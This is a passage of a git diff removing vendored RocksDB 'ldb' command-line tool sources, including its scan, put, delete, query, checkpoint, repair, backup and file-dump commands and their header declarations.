-  } else {
-    it->SeekToFirst();
-  }
-  int ttl_start;
-  if (!ParseIntOption(option_map_, ARG_TTL_START, ttl_start, exec_state_)) {
-    ttl_start = DBWithTTLImpl::kMinTimestamp;  // TTL introduction time
-  }
-  int ttl_end;
-  if (!ParseIntOption(option_map_, ARG_TTL_END, ttl_end, exec_state_)) {
-    ttl_end = DBWithTTLImpl::kMaxTimestamp;  // Max time allowed by TTL feature
-  }
-  if (ttl_end < ttl_start) {
-    fprintf(stderr, "Error: End time can't be less than start time\n");
-    delete it;
-    return;
-  }
-  if (is_db_ttl_ && timestamp_) {
-    fprintf(stdout, "Scanning key-values from %s to %s\n",
-            ReadableTime(ttl_start).c_str(), ReadableTime(ttl_end).c_str());
-  }
-  for ( ;
-        it->Valid() && (!end_key_specified_ || it->key().ToString() < end_key_);
-        it->Next()) {
-    if (is_db_ttl_) {
-      TtlIterator* it_ttl = static_cast_with_check<TtlIterator, Iterator>(it);
-      int rawtime = it_ttl->timestamp();
-      if (rawtime < ttl_start || rawtime >= ttl_end) {
-        continue;
-      }
-      if (timestamp_) {
-        fprintf(stdout, "%s ", ReadableTime(rawtime).c_str());
-      }
-    }
-
-    Slice key_slice = it->key();
-
-    std::string formatted_key;
-    if (is_key_hex_) {
-      formatted_key = "0x" + key_slice.ToString(true /* hex */);
-      key_slice = formatted_key;
-    } else if (ldb_options_.key_formatter) {
-      formatted_key = ldb_options_.key_formatter->Format(key_slice);
-      key_slice = formatted_key;
-    }
-
-    if (no_value_) {
-      fprintf(stdout, "%.*s\n", static_cast<int>(key_slice.size()),
-              key_slice.data());
-    } else {
-      Slice val_slice = it->value();
-      std::string formatted_value;
-      if (is_value_hex_) {
-        formatted_value = "0x" + val_slice.ToString(true /* hex */);
-        val_slice = formatted_value;
-      }
-      fprintf(stdout, "%.*s : %.*s\n", static_cast<int>(key_slice.size()),
-              key_slice.data(), static_cast<int>(val_slice.size()),
-              val_slice.data());
-    }
-
-    num_keys_scanned++;
-    if (max_keys_scanned_ >= 0 && num_keys_scanned >= max_keys_scanned_) {
-      break;
-    }
-  }
-  if (!it->status().ok()) {  // Check for any errors found during the scan
-    exec_state_ = LDBCommandExecuteResult::Failed(it->status().ToString());
-  }
-  delete it;
-}
-
-// ----------------------------------------------------------------------------
-
-DeleteCommand::DeleteCommand(const std::vector<std::string>& params,
-                             const std::map<std::string, std::string>& options,
-                             const std::vector<std::string>& flags)
-    : LDBCommand(options, flags, false,
-                 BuildCmdLineOptions({ARG_HEX, ARG_KEY_HEX, ARG_VALUE_HEX})) {
-  if (params.size() != 1) {
-    exec_state_ = LDBCommandExecuteResult::Failed(
-        "KEY must be specified for the delete command");
-  } else {
-    key_ = params.at(0);
-    if (is_key_hex_) {
-      key_ = HexToString(key_);
-    }
-  }
-}
-
-void DeleteCommand::Help(std::string& ret) {
-  ret.append("  ");
-  ret.append(DeleteCommand::Name() + " <key>");
-  ret.append("\n");
-}
-
-void DeleteCommand::DoCommand() {
-  if (!db_) {
-    assert(GetExecuteState().IsFailed());
-    return;
-  }
-  Status st = db_->Delete(WriteOptions(), GetCfHandle(), key_);
-  if (st.ok()) {
-    fprintf(stdout, "OK\n");
-  } else {
-    exec_state_ = LDBCommandExecuteResult::Failed(st.ToString());
-  }
-}
-
-DeleteRangeCommand::DeleteRangeCommand(
-    const std::vector<std::string>& params,
-    const std::map<std::string, std::string>& options,
-    const std::vector<std::string>& flags)
-    : LDBCommand(options, flags, false,
-                 BuildCmdLineOptions({ARG_HEX, ARG_KEY_HEX, ARG_VALUE_HEX})) {
-  if (params.size() != 2) {
-    exec_state_ = LDBCommandExecuteResult::Failed(
-        "begin and end keys must be specified for the delete command");
-  } else {
-    begin_key_ = params.at(0);
-    end_key_ = params.at(1);
-    if (is_key_hex_) {
-      begin_key_ = HexToString(begin_key_);
-      end_key_ = HexToString(end_key_);
-    }
-  }
-}
-
-void DeleteRangeCommand::Help(std::string& ret) {
-  ret.append("  ");
-  ret.append(DeleteRangeCommand::Name() + " <begin key> <end key>");
-  ret.append("\n");
-}
-
-void DeleteRangeCommand::DoCommand() {
-  if (!db_) {
-    assert(GetExecuteState().IsFailed());
-    return;
-  }
-  Status st =
-      db_->DeleteRange(WriteOptions(), GetCfHandle(), begin_key_, end_key_);
-  if (st.ok()) {
-    fprintf(stdout, "OK\n");
-  } else {
-    exec_state_ = LDBCommandExecuteResult::Failed(st.ToString());
-  }
-}
-
-PutCommand::PutCommand(const std::vector<std::string>& params,
-                       const std::map<std::string, std::string>& options,
-                       const std::vector<std::string>& flags)
-    : LDBCommand(options, flags, false,
-                 BuildCmdLineOptions({ARG_TTL, ARG_HEX, ARG_KEY_HEX,
-                                      ARG_VALUE_HEX, ARG_CREATE_IF_MISSING})) {
-  if (params.size() != 2) {
-    exec_state_ = LDBCommandExecuteResult::Failed(
-        "<key> and <value> must be specified for the put command");
-  } else {
-    key_ = params.at(0);
-    value_ = params.at(1);
-  }
-
-  if (is_key_hex_) {
-    key_ = HexToString(key_);
-  }
-
-  if (is_value_hex_) {
-    value_ = HexToString(value_);
-  }
-  create_if_missing_ = IsFlagPresent(flags_, ARG_CREATE_IF_MISSING);
-}
-
-void PutCommand::Help(std::string& ret) {
-  ret.append("  ");
-  ret.append(PutCommand::Name());
-  ret.append(" <key> <value> ");
-  ret.append(" [--" + ARG_TTL + "]");
-  ret.append("\n");
-}
-
-void PutCommand::DoCommand() {
-  if (!db_) {
-    assert(GetExecuteState().IsFailed());
-    return;
-  }
-  Status st = db_->Put(WriteOptions(), GetCfHandle(), key_, value_);
-  if (st.ok()) {
-    fprintf(stdout, "OK\n");
-  } else {
-    exec_state_ = LDBCommandExecuteResult::Failed(st.ToString());
-  }
-}
-
-Options PutCommand::PrepareOptionsForOpenDB() {
-  Options opt = LDBCommand::PrepareOptionsForOpenDB();
-  opt.create_if_missing = create_if_missing_;
-  return opt;
-}
-
-// ----------------------------------------------------------------------------
-
-const char* DBQuerierCommand::HELP_CMD = "help";
-const char* DBQuerierCommand::GET_CMD = "get";
-const char* DBQuerierCommand::PUT_CMD = "put";
-const char* DBQuerierCommand::DELETE_CMD = "delete";
-
-DBQuerierCommand::DBQuerierCommand(
-    const std::vector<std::string>& params,
-    const std::map<std::string, std::string>& options,
-    const std::vector<std::string>& flags)
-    : LDBCommand(
-          options, flags, false,
-          BuildCmdLineOptions({ARG_TTL, ARG_HEX, ARG_KEY_HEX, ARG_VALUE_HEX})) {
-
-}
-
-void DBQuerierCommand::Help(std::string& ret) {
-  ret.append("  ");
-  ret.append(DBQuerierCommand::Name());
-  ret.append(" [--" + ARG_TTL + "]");
-  ret.append("\n");
-  ret.append("    Starts a REPL shell.  Type help for list of available "
-             "commands.");
-  ret.append("\n");
-}
-
-void DBQuerierCommand::DoCommand() {
-  if (!db_) {
-    assert(GetExecuteState().IsFailed());
-    return;
-  }
-
-  ReadOptions read_options;
-  WriteOptions write_options;
-
-  std::string line;
-  std::string key;
-  std::string value;
-  while (getline(std::cin, line, '\n')) {
-    // Parse line into std::vector<std::string>
-    std::vector<std::string> tokens;
-    size_t pos = 0;
-    while (true) {
-      size_t pos2 = line.find(' ', pos);
-      if (pos2 == std::string::npos) {
-        break;
-      }
-      tokens.push_back(line.substr(pos, pos2-pos));
-      pos = pos2 + 1;
-    }
-    tokens.push_back(line.substr(pos));
-
-    const std::string& cmd = tokens[0];
-
-    if (cmd == HELP_CMD) {
-      fprintf(stdout,
-              "get <key>\n"
-              "put <key> <value>\n"
-              "delete <key>\n");
-    } else if (cmd == DELETE_CMD && tokens.size() == 2) {
-      key = (is_key_hex_ ? HexToString(tokens[1]) : tokens[1]);
-      db_->Delete(write_options, GetCfHandle(), Slice(key));
-      fprintf(stdout, "Successfully deleted %s\n", tokens[1].c_str());
-    } else if (cmd == PUT_CMD && tokens.size() == 3) {
-      key = (is_key_hex_ ? HexToString(tokens[1]) : tokens[1]);
-      value = (is_value_hex_ ? HexToString(tokens[2]) : tokens[2]);
-      db_->Put(write_options, GetCfHandle(), Slice(key), Slice(value));
-      fprintf(stdout, "Successfully put %s %s\n",
-              tokens[1].c_str(), tokens[2].c_str());
-    } else if (cmd == GET_CMD && tokens.size() == 2) {
-      key = (is_key_hex_ ? HexToString(tokens[1]) : tokens[1]);
-      if (db_->Get(read_options, GetCfHandle(), Slice(key), &value).ok()) {
-        fprintf(stdout, "%s\n", PrintKeyValue(key, value,
-              is_key_hex_, is_value_hex_).c_str());
-      } else {
-        fprintf(stdout, "Not found %s\n", tokens[1].c_str());
-      }
-    } else {
-      fprintf(stdout, "Unknown command %s\n", line.c_str());
-    }
-  }
-}
-
-// ----------------------------------------------------------------------------
-
-CheckConsistencyCommand::CheckConsistencyCommand(
-    const std::vector<std::string>& params,
-    const std::map<std::string, std::string>& options,
-    const std::vector<std::string>& flags)
-    : LDBCommand(options, flags, false, BuildCmdLineOptions({})) {}
-
-void CheckConsistencyCommand::Help(std::string& ret) {
-  ret.append("  ");
-  ret.append(CheckConsistencyCommand::Name());
-  ret.append("\n");
-}
-
-void CheckConsistencyCommand::DoCommand() {
-  Options opt = PrepareOptionsForOpenDB();
-  opt.paranoid_checks = true;
-  if (!exec_state_.IsNotStarted()) {
-    return;
-  }
-  DB* db;
-  Status st = DB::OpenForReadOnly(opt, db_path_, &db, false);
-  delete db;
-  if (st.ok()) {
-    fprintf(stdout, "OK\n");
-  } else {
-    exec_state_ = LDBCommandExecuteResult::Failed(st.ToString());
-  }
-}
-
-// ----------------------------------------------------------------------------
-
-const std::string CheckPointCommand::ARG_CHECKPOINT_DIR = "checkpoint_dir";
-
-CheckPointCommand::CheckPointCommand(
-    const std::vector<std::string>& params,
-    const std::map<std::string, std::string>& options,
-    const std::vector<std::string>& flags)
-    : LDBCommand(options, flags, false /* is_read_only */,
-                 BuildCmdLineOptions({ARG_CHECKPOINT_DIR})) {
-  auto itr = options.find(ARG_CHECKPOINT_DIR);
-  if (itr == options.end()) {
-    exec_state_ = LDBCommandExecuteResult::Failed(
-        "--" + ARG_CHECKPOINT_DIR + ": missing checkpoint directory");
-  } else {
-    checkpoint_dir_ = itr->second;
-  }
-}
-
-void CheckPointCommand::Help(std::string& ret) {
-  ret.append("  ");
-  ret.append(CheckPointCommand::Name());
-  ret.append(" [--" + ARG_CHECKPOINT_DIR + "] ");
-  ret.append("\n");
-}
-
-void CheckPointCommand::DoCommand() {
-  if (!db_) {
-    assert(GetExecuteState().IsFailed());
-    return;
-  }
-  Checkpoint* checkpoint;
-  Status status = Checkpoint::Create(db_, &checkpoint);
-  status = checkpoint->CreateCheckpoint(checkpoint_dir_);
-  if (status.ok()) {
-    printf("OK\n");
-  } else {
-    exec_state_ = LDBCommandExecuteResult::Failed(status.ToString());
-  }
-}
-
-// ----------------------------------------------------------------------------
-
-RepairCommand::RepairCommand(const std::vector<std::string>& params,
-                             const std::map<std::string, std::string>& options,
-                             const std::vector<std::string>& flags)
-    : LDBCommand(options, flags, false, BuildCmdLineOptions({})) {}
-
-void RepairCommand::Help(std::string& ret) {
-  ret.append("  ");
-  ret.append(RepairCommand::Name());
-  ret.append("\n");
-}
-
-void RepairCommand::DoCommand() {
-  Options options = PrepareOptionsForOpenDB();
-  options.info_log.reset(new StderrLogger(InfoLogLevel::WARN_LEVEL));
-  Status status = RepairDB(db_path_, options);
-  if (status.ok()) {
-    printf("OK\n");
-  } else {
-    exec_state_ = LDBCommandExecuteResult::Failed(status.ToString());
-  }
-}
-
-// ----------------------------------------------------------------------------
-
-const std::string BackupableCommand::ARG_NUM_THREADS = "num_threads";
-const std::string BackupableCommand::ARG_BACKUP_ENV_URI = "backup_env_uri";
-const std::string BackupableCommand::ARG_BACKUP_DIR = "backup_dir";
-const std::string BackupableCommand::ARG_STDERR_LOG_LEVEL = "stderr_log_level";
-
-BackupableCommand::BackupableCommand(
-    const std::vector<std::string>& params,
-    const std::map<std::string, std::string>& options,
-    const std::vector<std::string>& flags)
-    : LDBCommand(options, flags, false /* is_read_only */,
-                 BuildCmdLineOptions({ARG_BACKUP_ENV_URI, ARG_BACKUP_DIR,
-                                      ARG_NUM_THREADS, ARG_STDERR_LOG_LEVEL})),
-      num_threads_(1) {
-  auto itr = options.find(ARG_NUM_THREADS);
-  if (itr != options.end()) {
-    num_threads_ = std::stoi(itr->second);
-  }
-  itr = options.find(ARG_BACKUP_ENV_URI);
-  if (itr != options.end()) {
-    backup_env_uri_ = itr->second;
-  }
-  itr = options.find(ARG_BACKUP_DIR);
-  if (itr == options.end()) {
-    exec_state_ = LDBCommandExecuteResult::Failed("--" + ARG_BACKUP_DIR +
-                                                  ": missing backup directory");
-  } else {
-    backup_dir_ = itr->second;
-  }
-
-  itr = options.find(ARG_STDERR_LOG_LEVEL);
-  if (itr != options.end()) {
-    int stderr_log_level = std::stoi(itr->second);
-    if (stderr_log_level < 0 ||
-        stderr_log_level >= InfoLogLevel::NUM_INFO_LOG_LEVELS) {
-      exec_state_ = LDBCommandExecuteResult::Failed(
-          ARG_STDERR_LOG_LEVEL + " must be >= 0 and < " +
-          std::to_string(InfoLogLevel::NUM_INFO_LOG_LEVELS) + ".");
-    } else {
-      logger_.reset(
-          new StderrLogger(static_cast<InfoLogLevel>(stderr_log_level)));
-    }
-  }
-}
-
-void BackupableCommand::Help(const std::string& name, std::string& ret) {
-  ret.append("  ");
-  ret.append(name);
-  ret.append(" [--" + ARG_BACKUP_ENV_URI + "] ");
-  ret.append(" [--" + ARG_BACKUP_DIR + "] ");
-  ret.append(" [--" + ARG_NUM_THREADS + "] ");
-  ret.append(" [--" + ARG_STDERR_LOG_LEVEL + "=<int (InfoLogLevel)>] ");
-  ret.append("\n");
-}
-
-// ----------------------------------------------------------------------------
-
-BackupCommand::BackupCommand(const std::vector<std::string>& params,
-                             const std::map<std::string, std::string>& options,
-                             const std::vector<std::string>& flags)
-    : BackupableCommand(params, options, flags) {}
-
-void BackupCommand::Help(std::string& ret) {
-  BackupableCommand::Help(Name(), ret);
-}
-
-void BackupCommand::DoCommand() {
-  BackupEngine* backup_engine;
-  Status status;
-  if (!db_) {
-    assert(GetExecuteState().IsFailed());
-    return;
-  }
-  printf("open db OK\n");
-  std::unique_ptr<Env> custom_env_guard;
-  Env* custom_env = NewCustomObject<Env>(backup_env_uri_, &custom_env_guard);
-  BackupableDBOptions backup_options =
-      BackupableDBOptions(backup_dir_, custom_env);
-  backup_options.info_log = logger_.get();
-  backup_options.max_background_operations = num_threads_;
-  status = BackupEngine::Open(Env::Default(), backup_options, &backup_engine);
-  if (status.ok()) {
-    printf("open backup engine OK\n");
-  } else {
-    exec_state_ = LDBCommandExecuteResult::Failed(status.ToString());
-    return;
-  }
-  status = backup_engine->CreateNewBackup(db_);
-  if (status.ok()) {
-    printf("create new backup OK\n");
-  } else {
-    exec_state_ = LDBCommandExecuteResult::Failed(status.ToString());
-    return;
-  }
-}
-
-// ----------------------------------------------------------------------------
-
-RestoreCommand::RestoreCommand(
-    const std::vector<std::string>& params,
-    const std::map<std::string, std::string>& options,
-    const std::vector<std::string>& flags)
-    : BackupableCommand(params, options, flags) {}
-
-void RestoreCommand::Help(std::string& ret) {
-  BackupableCommand::Help(Name(), ret);
-}
-
-void RestoreCommand::DoCommand() {
-  std::unique_ptr<Env> custom_env_guard;
-  Env* custom_env = NewCustomObject<Env>(backup_env_uri_, &custom_env_guard);
-  std::unique_ptr<BackupEngineReadOnly> restore_engine;
-  Status status;
-  {
-    BackupableDBOptions opts(backup_dir_, custom_env);
-    opts.info_log = logger_.get();
-    opts.max_background_operations = num_threads_;
-    BackupEngineReadOnly* raw_restore_engine_ptr;
-    status = BackupEngineReadOnly::Open(Env::Default(), opts,
-                                        &raw_restore_engine_ptr);
-    if (status.ok()) {
-      restore_engine.reset(raw_restore_engine_ptr);
-    }
-  }
-  if (status.ok()) {
-    printf("open restore engine OK\n");
-    status = restore_engine->RestoreDBFromLatestBackup(db_path_, db_path_);
-  }
-  if (status.ok()) {
-    printf("restore from backup OK\n");
-  } else {
-    exec_state_ = LDBCommandExecuteResult::Failed(status.ToString());
-  }
-}
-
-// ----------------------------------------------------------------------------
-
-namespace {
-
-void DumpSstFile(std::string filename, bool output_hex, bool show_properties) {
-  std::string from_key;
-  std::string to_key;
-  if (filename.length() <= 4 ||
-      filename.rfind(".sst") != filename.length() - 4) {
-    std::cout << "Invalid sst file name." << std::endl;
-    return;
-  }
-  // no verification
-  rocksdb::SstFileReader reader(filename, false, output_hex);
-  Status st = reader.ReadSequential(true, -1, false,  // has_from
-                                    from_key, false,  // has_to
-                                    to_key);
-  if (!st.ok()) {
-    std::cerr << "Error in reading SST file " << filename << st.ToString()
-              << std::endl;
-    return;
-  }
-
-  if (show_properties) {
-    const rocksdb::TableProperties* table_properties;
-
-    std::shared_ptr<const rocksdb::TableProperties>
-        table_properties_from_reader;
-    st = reader.ReadTableProperties(&table_properties_from_reader);
-    if (!st.ok()) {
-      std::cerr << filename << ": " << st.ToString()
-                << ". Try to use initial table properties" << std::endl;
-      table_properties = reader.GetInitTableProperties();
-    } else {
-      table_properties = table_properties_from_reader.get();
-    }
-    if (table_properties != nullptr) {
-      std::cout << std::endl << "Table Properties:" << std::endl;
-      std::cout << table_properties->ToString("\n") << std::endl;
-      std::cout << "# deleted keys: "
-                << rocksdb::GetDeletedKeys(
-                       table_properties->user_collected_properties)
-                << std::endl;
-    }
-  }
-}
-
-}  // namespace
-
-DBFileDumperCommand::DBFileDumperCommand(
-    const std::vector<std::string>& params,
-    const std::map<std::string, std::string>& options,
-    const std::vector<std::string>& flags)
-    : LDBCommand(options, flags, true, BuildCmdLineOptions({})) {}
-
-void DBFileDumperCommand::Help(std::string& ret) {
-  ret.append("  ");
-  ret.append(DBFileDumperCommand::Name());
-  ret.append("\n");
-}
-
-void DBFileDumperCommand::DoCommand() {
-  if (!db_) {
-    assert(GetExecuteState().IsFailed());
-    return;
-  }
-  Status s;
-
-  std::cout << "Manifest File" << std::endl;
-  std::cout << "==============================" << std::endl;
-  std::string manifest_filename;
-  s = ReadFileToString(db_->GetEnv(), CurrentFileName(db_->GetName()),
-                       &manifest_filename);
-  if (!s.ok() || manifest_filename.empty() ||
-      manifest_filename.back() != '\n') {
-    std::cerr << "Error when reading CURRENT file "
-              << CurrentFileName(db_->GetName()) << std::endl;
-  }
-  // remove the trailing '\n'
-  manifest_filename.resize(manifest_filename.size() - 1);
-  std::string manifest_filepath = db_->GetName() + "/" + manifest_filename;
-  std::cout << manifest_filepath << std::endl;
-  DumpManifestFile(manifest_filepath, false, false, false);
-  std::cout << std::endl;
-
-  std::cout << "SST Files" << std::endl;
-  std::cout << "==============================" << std::endl;
-  std::vector<LiveFileMetaData> metadata;
-  db_->GetLiveFilesMetaData(&metadata);
-  for (auto& fileMetadata : metadata) {
-    std::string filename = fileMetadata.db_path + fileMetadata.name;
-    std::cout << filename << " level:" << fileMetadata.level << std::endl;
-    std::cout << "------------------------------" << std::endl;
-    DumpSstFile(filename, false, true);
-    std::cout << std::endl;
-  }
-  std::cout << std::endl;
-
-  std::cout << "Write Ahead Log Files" << std::endl;
-  std::cout << "==============================" << std::endl;
-  rocksdb::VectorLogPtr wal_files;
-  s = db_->GetSortedWalFiles(wal_files);
-  if (!s.ok()) {
-    std::cerr << "Error when getting WAL files" << std::endl;
-  } else {
-    for (auto& wal : wal_files) {
-      // TODO(qyang): option.wal_dir should be passed into ldb command
-      std::string filename = db_->GetOptions().wal_dir + wal->PathName();
-      std::cout << filename << std::endl;
-      DumpWalFile(filename, true, true, &exec_state_);
-    }
-  }
-}
-
-}   // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/tools/ldb_cmd_impl.h b/thirdparty/rocksdb/tools/ldb_cmd_impl.h
deleted file mode 100644
index 91afd26..0000000
--- a/thirdparty/rocksdb/tools/ldb_cmd_impl.h
+++ /dev/null
@@ -1,523 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#include "rocksdb/utilities/ldb_cmd.h"
-
-#include <map>
-#include <string>
-#include <utility>
-#include <vector>
-
-namespace rocksdb {
-
-class CompactorCommand : public LDBCommand {
- public:
-  static std::string Name() { return "compact"; }
-
-  CompactorCommand(const std::vector<std::string>& params,
-                   const std::map<std::string, std::string>& options,
-                   const std::vector<std::string>& flags);
-
-  static void Help(std::string& ret);
-
-  virtual void DoCommand() override;
-
- private:
-  bool null_from_;
-  std::string from_;
-  bool null_to_;
-  std::string to_;
-};
-
-class DBFileDumperCommand : public LDBCommand {
- public:
-  static std::string Name() { return "dump_live_files"; }
-
-  DBFileDumperCommand(const std::vector<std::string>& params,
-                      const std::map<std::string, std::string>& options,
-                      const std::vector<std::string>& flags);
-
-  static void Help(std::string& ret);
-
-  virtual void DoCommand() override;
-};
-
-class DBDumperCommand : public LDBCommand {
- public:
-  static std::string Name() { return "dump"; }
-
-  DBDumperCommand(const std::vector<std::string>& params,
-                  const std::map<std::string, std::string>& options,
-                  const std::vector<std::string>& flags);
-
-  static void Help(std::string& ret);
-
-  virtual void DoCommand() override;
-
- private:
-  /**
-   * Extract file name from the full path. We handle both the forward slash (/)
-   * and backslash (\) to make sure that different OS-s are supported.
-  */
-  static std::string GetFileNameFromPath(const std::string& s) {
-    std::size_t n = s.find_last_of("/\\");
-
-    if (std::string::npos == n) {
-      return s;
-    } else {
-      return s.substr(n + 1);
-    }
-  }
-
-  void DoDumpCommand();
-
-  bool null_from_;
-  std::string from_;
-  bool null_to_;
-  std::string to_;
-  int max_keys_;
-  std::string delim_;
-  bool count_only_;
-  bool count_delim_;
-  bool print_stats_;
-  std::string path_;
-
-  static const std::string ARG_COUNT_ONLY;
-  static const std::string ARG_COUNT_DELIM;
-  static const std::string ARG_STATS;
-  static const std::string ARG_TTL_BUCKET;
-};
-
-class InternalDumpCommand : public LDBCommand {
- public:
-  static std::string Name() { return "idump"; }
-
-  InternalDumpCommand(const std::vector<std::string>& params,
-                      const std::map<std::string, std::string>& options,
-                      const std::vector<std::string>& flags);
-
-  static void Help(std::string& ret);
-
-  virtual void DoCommand() override;
-
- private:
-  bool has_from_;
-  std::string from_;
-  bool has_to_;
-  std::string to_;
-  int max_keys_;
-  std::string delim_;
-  bool count_only_;
-  bool count_delim_;
-  bool print_stats_;
-  bool is_input_key_hex_;
-
-  static const std::string ARG_DELIM;
-  static const std::string ARG_COUNT_ONLY;
-  static const std::string ARG_COUNT_DELIM;
-  static const std::string ARG_STATS;
-  static const std::string ARG_INPUT_KEY_HEX;
-};
-
-class DBLoaderCommand : public LDBCommand {
- public:
-  static std::string Name() { return "load"; }
-
-  DBLoaderCommand(std::string& db_name, std::vector<std::string>& args);
-
-  DBLoaderCommand(const std::vector<std::string>& params,
-                  const std::map<std::string, std::string>& options,
-                  const std::vector<std::string>& flags);
-
-  static void Help(std::string& ret);
-  virtual void DoCommand() override;
-
-  virtual Options PrepareOptionsForOpenDB() override;
-
- private:
-  bool disable_wal_;
-  bool bulk_load_;
-  bool compact_;
-
-  static const std::string ARG_DISABLE_WAL;
-  static const std::string ARG_BULK_LOAD;
-  static const std::string ARG_COMPACT;
-};
-
-class ManifestDumpCommand : public LDBCommand {
- public:
-  static std::string Name() { return "manifest_dump"; }
-
-  ManifestDumpCommand(const std::vector<std::string>& params,
-                      const std::map<std::string, std::string>& options,
-                      const std::vector<std::string>& flags);
-
-  static void Help(std::string& ret);
-  virtual void DoCommand() override;
-
-  virtual bool NoDBOpen() override { return true; }
-
- private:
-  bool verbose_;
-  bool json_;
-  std::string path_;
-
-  static const std::string ARG_VERBOSE;
-  static const std::string ARG_JSON;
-  static const std::string ARG_PATH;
-};
-
-class ListColumnFamiliesCommand : public LDBCommand {
- public:
-  static std::string Name() { return "list_column_families"; }
-
-  ListColumnFamiliesCommand(const std::vector<std::string>& params,
-                            const std::map<std::string, std::string>& options,
-                            const std::vector<std::string>& flags);
-
-  static void Help(std::string& ret);
-  virtual void DoCommand() override;
-
-  virtual bool NoDBOpen() override { return true; }
-
- private:
-  std::string dbname_;
-};
-
-class CreateColumnFamilyCommand : public LDBCommand {
- public:
-  static std::string Name() { return "create_column_family"; }
-
-  CreateColumnFamilyCommand(const std::vector<std::string>& params,
-                            const std::map<std::string, std::string>& options,
-                            const std::vector<std::string>& flags);
-
-  static void Help(std::string& ret);
-  virtual void DoCommand() override;
-
-  virtual bool NoDBOpen() override { return false; }
-
- private:
-  std::string new_cf_name_;
-};
-
-class ReduceDBLevelsCommand : public LDBCommand {
- public:
-  static std::string Name() { return "reduce_levels"; }
-
-  ReduceDBLevelsCommand(const std::vector<std::string>& params,
-                        const std::map<std::string, std::string>& options,
-                        const std::vector<std::string>& flags);
-
-  virtual Options PrepareOptionsForOpenDB() override;
-
-  virtual void DoCommand() override;
-
-  virtual bool NoDBOpen() override { return true; }
-
-  static void Help(std::string& msg);
-
-  static std::vector<std::string> PrepareArgs(const std::string& db_path,
-                                              int new_levels,
-                                              bool print_old_level = false);
-
- private:
-  int old_levels_;
-  int new_levels_;
-  bool print_old_levels_;
-
-  static const std::string ARG_NEW_LEVELS;
-  static const std::string ARG_PRINT_OLD_LEVELS;
-
-  Status GetOldNumOfLevels(Options& opt, int* levels);
-};
-
-class ChangeCompactionStyleCommand : public LDBCommand {
- public:
-  static std::string Name() { return "change_compaction_style"; }
-
-  ChangeCompactionStyleCommand(
-      const std::vector<std::string>& params,
-      const std::map<std::string, std::string>& options,
-      const std::vector<std::string>& flags);
-
-  virtual Options PrepareOptionsForOpenDB() override;
-
-  virtual void DoCommand() override;
-
-  static void Help(std::string& msg);
-
- private:
-  int old_compaction_style_;
-  int new_compaction_style_;
-
-  static const std::string ARG_OLD_COMPACTION_STYLE;
-  static const std::string ARG_NEW_COMPACTION_STYLE;
-};
-
-class WALDumperCommand : public LDBCommand {
- public:
-  static std::string Name() { return "dump_wal"; }
-
-  WALDumperCommand(const std::vector<std::string>& params,
-                   const std::map<std::string, std::string>& options,
-                   const std::vector<std::string>& flags);
-
-  virtual bool NoDBOpen() override { return true; }
-
-  static void Help(std::string& ret);
-  virtual void DoCommand() override;
-
- private:
-  bool print_header_;
-  std::string wal_file_;
-  bool print_values_;
-
-  static const std::string ARG_WAL_FILE;
-  static const std::string ARG_PRINT_HEADER;
-  static const std::string ARG_PRINT_VALUE;
-};
-
-class GetCommand : public LDBCommand {
- public:
-  static std::string Name() { return "get"; }
-
-  GetCommand(const std::vector<std::string>& params,
-             const std::map<std::string, std::string>& options,
-             const std::vector<std::string>& flags);
-
-  virtual void DoCommand() override;
-
-  static void Help(std::string& ret);
-
- private:
-  std::string key_;
-};
-
-class ApproxSizeCommand : public LDBCommand {
- public:
-  static std::string Name() { return "approxsize"; }
-
-  ApproxSizeCommand(const std::vector<std::string>& params,
-                    const std::map<std::string, std::string>& options,
-                    const std::vector<std::string>& flags);
-
-  virtual void DoCommand() override;
-
-  static void Help(std::string& ret);
-
- private:
-  std::string start_key_;
-  std::string end_key_;
-};
-
-class BatchPutCommand : public LDBCommand {
- public:
-  static std::string Name() { return "batchput"; }
-
-  BatchPutCommand(const std::vector<std::string>& params,
-                  const std::map<std::string, std::string>& options,
-                  const std::vector<std::string>& flags);
-
-  virtual void DoCommand() override;
-
-  static void Help(std::string& ret);
-
-  virtual Options PrepareOptionsForOpenDB() override;
-
- private:
-  /**
-   * The key-values to be inserted.
-   */
-  std::vector<std::pair<std::string, std::string>> key_values_;
-};
-
-class ScanCommand : public LDBCommand {
- public:
-  static std::string Name() { return "scan"; }
-
-  ScanCommand(const std::vector<std::string>& params,
-              const std::map<std::string, std::string>& options,
-              const std::vector<std::string>& flags);
-
-  virtual void DoCommand() override;
-
-  static void Help(std::string& ret);
-
- private:
-  std::string start_key_;
-  std::string end_key_;
-  bool start_key_specified_;
-  bool end_key_specified_;
-  int max_keys_scanned_;
-  bool no_value_;
-};
-
-class DeleteCommand : public LDBCommand {
- public:
-  static std::string Name() { return "delete"; }
-
-  DeleteCommand(const std::vector<std::string>& params,
-                const std::map<std::string, std::string>& options,
-                const std::vector<std::string>& flags);
-
-  virtual void DoCommand() override;
-
-  static void Help(std::string& ret);
-
- private:
-  std::string key_;
-};
-
-class DeleteRangeCommand : public LDBCommand {
- public:
-  static std::string Name() { return "deleterange"; }
-
-  DeleteRangeCommand(const std::vector<std::string>& params,
-                     const std::map<std::string, std::string>& options,
-                     const std::vector<std::string>& flags);
-
-  virtual void DoCommand() override;
-
-  static void Help(std::string& ret);
-
- private:
-  std::string begin_key_;
-  std::string end_key_;
-};
-
-class PutCommand : public LDBCommand {
- public:
-  static std::string Name() { return "put"; }
-
-  PutCommand(const std::vector<std::string>& params,
-             const std::map<std::string, std::string>& options,
-             const std::vector<std::string>& flags);
-
-  virtual void DoCommand() override;
-
-  static void Help(std::string& ret);
-
-  virtual Options PrepareOptionsForOpenDB() override;
-
- private:
-  std::string key_;
-  std::string value_;
-};
-
-/**
- * Command that starts up a REPL shell that allows
- * get/put/delete.
- */
-class DBQuerierCommand : public LDBCommand {
- public:
-  static std::string Name() { return "query"; }
-
-  DBQuerierCommand(const std::vector<std::string>& params,
-                   const std::map<std::string, std::string>& options,
-                   const std::vector<std::string>& flags);
-
-  static void Help(std::string& ret);
-
-  virtual void DoCommand() override;
-
- private:
-  static const char* HELP_CMD;
-  static const char* GET_CMD;
-  static const char* PUT_CMD;
-  static const char* DELETE_CMD;
-};
-
-class CheckConsistencyCommand : public LDBCommand {
- public:
-  static std::string Name() { return "checkconsistency"; }
-
